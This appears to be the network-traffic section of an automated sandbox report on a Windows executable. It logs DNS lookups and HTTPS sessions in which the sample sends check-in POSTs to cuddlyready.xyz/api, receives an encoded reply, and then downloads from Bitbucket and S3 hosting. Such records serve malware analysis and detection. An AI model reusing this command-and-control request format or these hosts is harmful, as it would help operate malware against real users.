                                                                                                                                                          Dec 23, 2024 09:17:09.134422064 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.134434938 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:09.134443045 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.134480953 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:09.279424906 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.279464006 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.279506922 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.279515028 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:09.279537916 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.279562950 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:09.286366940 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.286393881 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.286434889 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:09.286448002 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.286479950 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:09.293412924 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.293458939 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.293509960 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.293545008 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:09.293545008 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:09.293569088 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.293608904 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:09.300574064 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.300595999 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.300664902 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:09.300676107 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.300692081 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:09.300726891 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:09.301464081 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.307640076 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.307657957 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.307712078 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:09.307724953 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.307753086 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:09.315082073 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.315124035 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.315165043 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:09.315181017 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.315196037 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:09.322099924 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.322139978 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.322160006 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:09.322165966 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.322204113 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:09.329253912 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.329286098 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.329315901 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:09.329320908 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.329364061 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:09.330132008 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.330216885 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:09.335426092 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:09.335498095 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:09.475033045 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.475063086 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.475107908 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.475142956 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:09.475157976 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.475183964 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:09.482050896 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.482086897 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.482129097 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:09.482153893 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.482183933 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:09.489095926 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.489118099 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.489207029 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:09.489213943 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.489337921 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:09.496138096 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.496169090 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.496212959 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:09.496220112 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.496262074 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:09.503719091 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.503773928 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.503810883 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.503818989 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:09.503844023 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.503871918 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:09.504143953 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:09.511066914 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.511118889 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.511161089 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:09.511183977 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.511200905 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:09.511513948 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:09.511521101 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.518018961 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.518073082 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.518119097 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:09.518134117 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.518162012 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:09.535183907 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:09.535207033 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.535803080 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:09.662559032 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.662590981 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.662626028 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:09.662638903 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.663110018 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:09.663410902 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.669621944 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.669644117 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.669770002 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:09.669770002 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:09.669780970 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.677464962 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.677515030 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.677567959 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:09.677575111 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.677690983 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:09.684586048 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.684645891 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.684684038 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:09.684694052 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.684726000 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:09.691730022 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.691771030 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.691803932 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.691807032 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:09.691814899 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.691843987 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:09.691900015 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:09.698462009 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.698491096 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.698580980 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:09.698587894 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.698862076 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:09.699301004 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.706182003 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.706204891 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.706279993 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:09.706286907 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.706432104 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:09.706501961 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.706613064 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:09.713649035 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.713670015 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.713701963 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.713789940 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:09.713789940 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:09.713798046 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.765969038 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:09.858493090 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.858525038 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.858607054 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.858622074 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:09.858622074 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:09.858644009 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.858669043 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:09.865578890 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.865608931 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.865655899 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:09.865664005 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.865967989 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:09.872530937 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.872605085 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.872651100 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:09.872662067 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.872687101 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:09.874253035 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.874331951 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.874357939 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:09.874418020 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:09.946759939 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:10.897244930 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:10.897278070 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:10.897291899 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:10.897298098 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                          Dec 23, 2024 09:16:39.856121063 CET6198353192.168.2.61.1.1.1
                                                                                                                                                          Dec 23, 2024 09:16:40.261629105 CET53619831.1.1.1192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:02.921773911 CET4995653192.168.2.61.1.1.1
                                                                                                                                                          Dec 23, 2024 09:17:03.058681965 CET53499561.1.1.1192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:05.349839926 CET5256153192.168.2.61.1.1.1
                                                                                                                                                          Dec 23, 2024 09:17:05.640197992 CET53525611.1.1.1192.168.2.6
                                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                          Dec 23, 2024 09:16:39.856121063 CET192.168.2.61.1.1.10xcdcaStandard query (0)cuddlyready.xyzA (IP address)IN (0x0001)false
                                                                                                                                                          Dec 23, 2024 09:17:02.921773911 CET192.168.2.61.1.1.10xed00Standard query (0)bitbucket.orgA (IP address)IN (0x0001)false
                                                                                                                                                          Dec 23, 2024 09:17:05.349839926 CET192.168.2.61.1.1.10x2483Standard query (0)bbuseruploads.s3.amazonaws.comA (IP address)IN (0x0001)false
                                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                          Dec 23, 2024 09:16:34.251465082 CET1.1.1.1192.168.2.60xfd87No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Dec 23, 2024 09:16:34.251465082 CET1.1.1.1192.168.2.60xfd87No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                                                                          Dec 23, 2024 09:16:40.261629105 CET1.1.1.1192.168.2.60xcdcaNo error (0)cuddlyready.xyz172.67.150.173A (IP address)IN (0x0001)false
                                                                                                                                                          Dec 23, 2024 09:16:40.261629105 CET1.1.1.1192.168.2.60xcdcaNo error (0)cuddlyready.xyz104.21.32.96A (IP address)IN (0x0001)false
                                                                                                                                                          Dec 23, 2024 09:17:03.058681965 CET1.1.1.1192.168.2.60xed00No error (0)bitbucket.org185.166.143.48A (IP address)IN (0x0001)false
                                                                                                                                                          Dec 23, 2024 09:17:03.058681965 CET1.1.1.1192.168.2.60xed00No error (0)bitbucket.org185.166.143.49A (IP address)IN (0x0001)false
                                                                                                                                                          Dec 23, 2024 09:17:03.058681965 CET1.1.1.1192.168.2.60xed00No error (0)bitbucket.org185.166.143.50A (IP address)IN (0x0001)false
                                                                                                                                                          Dec 23, 2024 09:17:05.640197992 CET1.1.1.1192.168.2.60x2483No error (0)bbuseruploads.s3.amazonaws.coms3-1-w.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Dec 23, 2024 09:17:05.640197992 CET1.1.1.1192.168.2.60x2483No error (0)s3-1-w.amazonaws.coms3-w.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Dec 23, 2024 09:17:05.640197992 CET1.1.1.1192.168.2.60x2483No error (0)s3-w.us-east-1.amazonaws.com3.5.29.90A (IP address)IN (0x0001)false
                                                                                                                                                          Dec 23, 2024 09:17:05.640197992 CET1.1.1.1192.168.2.60x2483No error (0)s3-w.us-east-1.amazonaws.com52.216.34.185A (IP address)IN (0x0001)false
                                                                                                                                                          Dec 23, 2024 09:17:05.640197992 CET1.1.1.1192.168.2.60x2483No error (0)s3-w.us-east-1.amazonaws.com16.182.66.137A (IP address)IN (0x0001)false
                                                                                                                                                          Dec 23, 2024 09:17:05.640197992 CET1.1.1.1192.168.2.60x2483No error (0)s3-w.us-east-1.amazonaws.com52.216.62.169A (IP address)IN (0x0001)false
                                                                                                                                                          Dec 23, 2024 09:17:05.640197992 CET1.1.1.1192.168.2.60x2483No error (0)s3-w.us-east-1.amazonaws.com16.182.41.153A (IP address)IN (0x0001)false
                                                                                                                                                          Dec 23, 2024 09:17:05.640197992 CET1.1.1.1192.168.2.60x2483No error (0)s3-w.us-east-1.amazonaws.com52.216.205.179A (IP address)IN (0x0001)false
                                                                                                                                                          Dec 23, 2024 09:17:05.640197992 CET1.1.1.1192.168.2.60x2483No error (0)s3-w.us-east-1.amazonaws.com52.217.165.161A (IP address)IN (0x0001)false
                                                                                                                                                          Dec 23, 2024 09:17:05.640197992 CET1.1.1.1192.168.2.60x2483No error (0)s3-w.us-east-1.amazonaws.com3.5.28.19A (IP address)IN (0x0001)false
                                                                                                                                                          • cuddlyready.xyz
                                                                                                                                                          • bitbucket.org
                                                                                                                                                          • bbuseruploads.s3.amazonaws.com
                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          0192.168.2.649721172.67.150.1734434140C:\Users\user\Desktop\BJQizQ6sqT.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-12-23 08:16:41 UTC262OUTPOST /api HTTP/1.1
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                          Content-Length: 8
                                                                                                                                                          Host: cuddlyready.xyz
                                                                                                                                                          2024-12-23 08:16:41 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                          Data Ascii: act=life
                                                                                                                                                          2024-12-23 08:16:42 UTC1123INHTTP/1.1 200 OK
                                                                                                                                                          Date: Mon, 23 Dec 2024 08:16:42 GMT
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          Set-Cookie: PHPSESSID=q8og87vi4tr40mg8lagh6u5rds; expires=Fri, 18 Apr 2025 02:03:21 GMT; Max-Age=9999999; path=/
                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                          Pragma: no-cache
                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                          vary: accept-encoding
                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qUumnh1fLezq8p6F6mnpukMYfj2pFYgeNyMG2bKveGZYrozkhTUaQ0trb9f2wUtj3nJPmOpioIedTMrDRQ9tUBSEQ%2B8uQ8HTzsZ%2FYDt6JRJ6VDslsR%2B5dhdg4IAv8GpJkdw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                          Server: cloudflare
                                                                                                                                                          CF-RAY: 8f66e9359e0c7cea-EWR
                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1830&min_rtt=1816&rtt_var=691&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=906&delivery_rate=1607929&cwnd=226&unsent_bytes=0&cid=8196a2cb8fd3e578&ts=863&x=0"
                                                                                                                                                          2024-12-23 08:16:42 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                          Data Ascii: 2ok
                                                                                                                                                          2024-12-23 08:16:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                          Data Ascii: 0


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1192.168.2.649722172.67.150.1734434140C:\Users\user\Desktop\BJQizQ6sqT.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-12-23 08:16:43 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                          Content-Length: 53
                                                                                                                                                          Host: cuddlyready.xyz
                                                                                                                                                          2024-12-23 08:16:43 UTC53OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d
                                                                                                                                                          Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
                                                                                                                                                          2024-12-23 08:16:44 UTC1125INHTTP/1.1 200 OK
                                                                                                                                                          Date: Mon, 23 Dec 2024 08:16:44 GMT
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          Set-Cookie: PHPSESSID=47msghe9mctbpndlo2u03m2rfv; expires=Fri, 18 Apr 2025 02:03:23 GMT; Max-Age=9999999; path=/
                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                          Pragma: no-cache
                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                          vary: accept-encoding
                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M72q7FPAgQXFJunoG8R5C8TBKNXXFP2cu3VoXBJAttf7oN3ZeLmi3lAcJQk6dFODJ4kAJ%2Fd3b%2BQea7LlZAr8rlwUislLO1%2FHqwk3T%2FYiUt7Kq6sntkeIKdcEm2tQFl6pkBg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                          Server: cloudflare
                                                                                                                                                          CF-RAY: 8f66e9421ff50f4a-EWR
                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1490&min_rtt=1488&rtt_var=563&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2837&recv_bytes=952&delivery_rate=1936339&cwnd=168&unsent_bytes=0&cid=d657c0e6db6074c7&ts=772&x=0"
                                                                                                                                                          2024-12-23 08:16:44 UTC244INData Raw: 63 34 33 0d 0a 57 2b 6b 32 61 58 73 42 39 69 43 63 6f 63 36 44 41 2b 69 4b 4e 6f 75 65 4b 34 36 66 47 55 53 55 74 75 35 7a 7a 6d 35 30 30 51 4d 67 79 30 42 4c 51 54 58 61 41 75 2f 45 37 4c 6c 33 6d 76 39 54 70 37 78 4b 36 72 30 6a 49 76 58 61 6e 52 62 69 54 41 4b 38 49 57 47 50 56 77 55 49 5a 4e 6f 43 2b 64 6e 73 75 56 69 54 71 46 50 6c 76 42 47 73 2b 6e 4d 6d 39 64 71 4d 45 71 55 42 42 4c 31 67 4d 34 56 52 41 52 35 69 6b 6b 48 77 7a 4b 76 6d 5a 6f 6e 67 57 4f 4c 7a 51 2b 4f 39 4e 57 62 78 7a 4d 78 4a 37 43 4d 52 70 57 49 57 69 45 55 43 57 58 7a 61 57 37 37 45 6f 4b 45 35 79 75 74 54 36 66 4a 4e 36 76 52 78 4c 50 7a 53 6a 52 65 6b 48 68 32 33 61 7a 4f 4c 55 67 41 55 61 34 5a 4d 2b 73 75 67 34 47 79 4a 71 42 71 70 2b 31 47
                                                                                                                                                          Data Ascii: c43W+k2aXsB9iCcoc6DA+iKNoueK46fGUSUtu5zzm500QMgy0BLQTXaAu/E7Ll3mv9Tp7xK6r0jIvXanRbiTAK8IWGPVwUIZNoC+dnsuViTqFPlvBGs+nMm9dqMEqUBBL1gM4VRAR5ikkHwzKvmZongWOLzQ+O9NWbxzMxJ7CMRpWIWiEUCWXzaW77EoKE5yutT6fJN6vRxLPzSjRekHh23azOLUgAUa4ZM+sug4GyJqBqp+1G
